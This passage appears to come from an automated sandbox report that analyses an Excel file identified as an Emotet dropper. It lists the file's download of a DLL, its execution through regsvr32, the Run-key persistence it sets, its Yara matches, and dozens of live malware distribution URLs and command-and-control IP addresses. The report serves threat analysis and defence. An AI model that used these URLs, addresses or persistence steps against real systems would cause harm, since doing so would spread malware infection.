                      Source: C:\Windows\System32\regsvr32.exe TID: 1648Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2956Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2548Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2548Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 2.8 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034370 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034490 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10040590 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10039C90 SetUnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10039CC0 SetUnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1002FF40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExA,RegQueryValueExA,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetUserDefaultLCID,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoA,GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003F040 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		11
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		141
                      Masquerading                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Input Capture                      		Exfiltration Over Other Network Medium21
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization Scripts11
                      Registry Run Keys / Startup Folder                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory12
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Exfiltration Over Bluetooth14
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)1
                      Extra Window Memory Injection                      		111
                      Process Injection                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                      Scripting                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer124
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32                      		DCSync26
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Extra Window Memory Injection                      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 746414 Sample: 4470_02112022.xls Startdate: 15/11/2022 Architecture: WINDOWS Score: 100 37 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->37 39 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->39 41 43 other IPs or domains 2->41 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 12 other signatures 2->59 8 EXCEL.EXE 7 25 2->8         started        13 regsvr32.exe 2->13         started        signatures3 process4 dnsIp5 43 www.spinbalence.com 8->43 45 sat7ate.com 8->45 47 4 other IPs or domains 8->47 29 C:\Users\user\oxnv4.ooccxx, PE32+ 8->29 dropped 31 C:\Users\user\AppData\...\40hd04O0[1].dll, PE32+ 8->31 dropped 33 C:\Users\user\Desktop\4470_02112022.xls, Composite 8->33 dropped 61 Document exploit detected (creates forbidden files) 8->61 63 Document exploit detected (UrlDownloadToFile) 8->63 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        23 regsvr32.exe 8->23         started        65 System process connects to network (likely due to code injection or exploit) 13->65 file6 67 Outdated Microsoft Office dropper detected 43->67 signatures7 process8 file9 35 C:\Windows\System32\...\FatGkw.dll (copy), PE32+ 15->35 dropped 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->51 25 regsvr32.exe 1 15->25         started        signatures10 process11 dnsIp12 49 218.38.121.17, 443, 49178, 49179 SKB-ASSKBroadbandCoLtdKR Korea Republic of 25->49 69 Creates an autostart registry key pointing to binary in C:\Windows 25->69 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      4470_02112022.xls81%ReversingLabsDocument-Office.Trojan.Emotet
                      4470_02112022.xls68%VirustotalBrowse
                      4470_02112022.xls32%MetadefenderBrowse
                      4470_02112022.xls100%AviraXF/Agent.B2

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll81%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll20%MetadefenderBrowse
                      C:\Users\user\oxnv4.ooccxx81%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\oxnv4.ooccxx20%MetadefenderBrowse
                      C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)81%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)20%MetadefenderBrowse

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.2.regsvr32.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      10.2.regsvr32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.2010000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      www.3d-stickers.com12%VirustotalBrowse
                      www.spinbalence.com12%VirustotalBrowse
                      navylin.com13%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://218.38.121.17/0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.3d-stickers.com/Content/Afa1PcRuxh/0%Avira URL Cloudsafe
                      https://www.3d-stickers.com/page-non-trouvee100%Avira URL Cloudmalware
                      https://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      https://www.spinbalence.com/index.php?controller=404100%Avira URL Cloudmalware
                      http://www.3d-stickers.com/Content/Afa1PcRuxh/100%Avira URL Cloudmalware
                      http://navylin.com/bsavxiv/axHQYKl/100%Avira URL Cloudmalware
                      http://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      https://secure.comodo.co0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.3d-stickers.com
                      		163.172.108.69
                      		truefalseunknown
                      www.spinbalence.com
                      		163.172.115.127
                      		truefalseunknown
                      navylin.com
                      		47.92.133.65
                      		truefalseunknown
                      sat7ate.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.3d-stickers.com/Content/Afa1PcRuxh/true
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.spinbalence.com/Adapter/moycMR/false
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.spinbalence.com/index.php?controller=404false
                        • Avira URL Cloud: malware
                        		unknown
                        https://218.38.121.17/true
                        • URL Reputation: safe
                        		unknown
                        http://navylin.com/bsavxiv/axHQYKl/false
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.3d-stickers.com/page-non-trouveetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.spinbalence.com/Adapter/moycMR/false
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.3d-stickers.com/Content/Afa1PcRuxh/true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.entrust.net03regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://secure.comodo.coregsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.entrust.net0Dregsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              188.165.79.151
                              		unknownFrance
                              		16276OVHFRtrue
                              196.44.98.190
                              		unknownGhana
                              		327814EcobandGHtrue
                              174.138.33.49
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              36.67.23.59
                              		unknownIndonesia
                              		17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                              103.41.204.169
                              		unknownIndonesia
                              		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                              85.214.67.203
                              		unknownGermany
                              		6724STRATOSTRATOAGDEtrue
                              83.229.80.93
                              		unknownUnited Kingdom
                              		8513SKYVISIONGBtrue
                              198.199.70.22
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              93.104.209.107
                              		unknownGermany
                              		8767MNET-ASGermanyDEtrue
                              186.250.48.5
                              		unknownBrazil
                              		262807RedfoxTelecomunicacoesLtdaBRtrue
                              175.126.176.79
                              		unknownKorea Republic of
                              		9523MOKWON-AS-KRMokwonUniversityKRtrue
                              128.199.242.164
                              		unknownUnited Kingdom
                              		14061DIGITALOCEAN-ASNUStrue
                              178.238.225.252
                              		unknownGermany
                              		51167CONTABODEtrue
                              163.172.115.127
                              		www.spinbalence.comUnited Kingdom
                              		12876OnlineSASFRfalse
                              190.145.8.4
                              		unknownColombia
                              		14080TelmexColombiaSACOtrue
                              46.101.98.60
                              		unknownNetherlands
                              		14061DIGITALOCEAN-ASNUStrue
                              82.98.180.154
                              		unknownSpain
                              		42612DINAHOSTING-ASEStrue
                              103.71.99.57
                              		unknownIndia
                              		135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                              87.106.97.83
                              		unknownGermany
                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                              103.254.12.236
                              		unknownViet Nam
                              		56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                              103.85.95.4
                              		unknownIndonesia
                              		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                              202.134.4.210
                              		unknownIndonesia
                              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                              165.22.254.236
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              78.47.204.80
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              118.98.72.86
                              		unknownIndonesia
                              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                              139.59.80.108
                              		unknownSingapore
                              		14061DIGITALOCEAN-ASNUStrue
                              104.244.79.94
                              		unknownUnited States
                              		53667PONYNETUStrue
                              37.44.244.177
                              		unknownGermany
                              		47583AS-HOSTINGERLTtrue
                              51.75.33.122
                              		unknownFrance
                              		16276OVHFRtrue
                              47.92.133.65
                              		navylin.comChina
                              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                              160.16.143.191
                              		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                              103.56.149.105
                              		unknownIndonesia
                              		55688BEON-AS-IDPTBeonIntermediaIDtrue
                              85.25.120.45
                              		unknownGermany
                              		8972GD-EMEA-DC-SXB1DEtrue
                              139.196.72.155
                              		unknownChina
                              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                              103.126.216.86
                              		unknownBangladesh
                              		138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                              128.199.217.206
                              		unknownUnited Kingdom
                              		14061DIGITALOCEAN-ASNUStrue
                              114.79.130.68
                              		unknownIndia
                              		45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                              103.224.241.74
                              		unknownIndia
                              		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                              210.57.209.142
                              		unknownIndonesia
                              		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                              202.28.34.99
                              		unknownThailand
                              		9562MSU-TH-APMahasarakhamUniversityTHtrue
                              80.211.107.116
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              54.37.228.122
                              		unknownFrance
                              		16276OVHFRtrue
                              163.172.108.69
                              		www.3d-stickers.comUnited Kingdom
                              		12876OnlineSASFRfalse
                              218.38.121.17
                              		unknownKorea Republic of
                              		9318SKB-ASSKBroadbandCoLtdKRtrue
                              185.148.169.10
                              		unknownGermany
                              		44780EVERSCALE-ASDEtrue
                              195.77.239.39
                              		unknownSpain
                              		60493FICOSA-ASEStrue
                              178.62.112.199
                              		unknownEuropean Union
                              		14061DIGITALOCEAN-ASNUStrue
                              62.171.178.147
                              		unknownUnited Kingdom
                              		51167CONTABODEtrue
                              64.227.55.231
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue

                              Private

                              IP
                              192.168.2.255

                              General Information

                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:746414
                              Start date and time:2022-11-15 12:39:06 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:4470_02112022.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@12/10@4/50
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 79.3% (good quality ratio 68.6%)
                              • Quality average: 70.1%
                              • Quality standard deviation: 34.9%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Found warning dialog
                              • Click Ok
                              • Found warning dialog
                              • Click Ok
                              • Found warning dialog
                              • Click Ok
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:40:34API Interceptor8x Sleep call for process: regsvr32.exe modified
                              12:41:18AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run FatGkw.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):769024
                              Entropy (8bit):6.637885736387009
                              Encrypted:false
                              SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                              MD5:22CE6200C1714603F94B11F6DF41140F
                              SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                              SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                              SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 81%
                              • Antivirus: Metadefender, Detection: 20%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\~DFF4CE5664A8A889FE.TMP

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):28672
                              Entropy (8bit):3.1569743079218417
                              Encrypted:false
